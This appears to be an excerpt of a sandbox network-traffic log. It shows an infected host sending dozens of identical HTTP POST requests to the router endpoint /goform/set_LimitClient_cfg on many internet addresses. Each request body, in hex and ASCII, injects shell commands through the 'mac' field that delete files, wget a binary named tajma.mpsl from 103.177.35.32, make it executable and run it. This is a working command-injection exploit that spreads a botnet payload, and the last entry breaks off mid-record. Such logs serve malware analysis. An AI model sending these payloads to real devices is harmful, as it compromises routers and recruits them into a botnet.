                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2957192.168.2.2353408151.132.154.1088080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.474697113 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2958192.168.2.2335868191.182.223.2218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.474719048 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2959192.168.2.234417852.37.195.08080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.474730015 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2960192.168.2.2349822212.200.247.1668080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.474760056 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2961192.168.2.235485276.250.134.178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.474766016 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2962192.168.2.236047666.229.147.1688080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.474796057 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2963192.168.2.233411895.9.245.278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.474812031 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2964192.168.2.234005093.42.94.1168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.474826097 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2965192.168.2.2344288103.159.77.1438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.474843979 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2966192.168.2.235345459.17.120.248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.474847078 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2967192.168.2.234165248.166.197.2418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.474879980 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2968192.168.2.2347366168.166.157.828080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.474880934 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2969192.168.2.2350150221.45.254.1098080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.474900007 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2970192.168.2.235144060.213.202.2048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.474919081 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2971192.168.2.233378852.32.106.1138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501487970 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2972192.168.2.2348136193.192.145.2478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501559019 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2973192.168.2.2349698125.248.77.2558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501559019 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2974192.168.2.234293499.23.91.1938080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501580954 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2975192.168.2.234766841.166.254.748080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501610994 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2976192.168.2.2355384142.235.128.208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501653910 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2977192.168.2.2339856112.179.98.528080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501682997 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2978192.168.2.235207680.43.252.1498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501733065 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2979192.168.2.235215480.228.251.2558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501770020 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
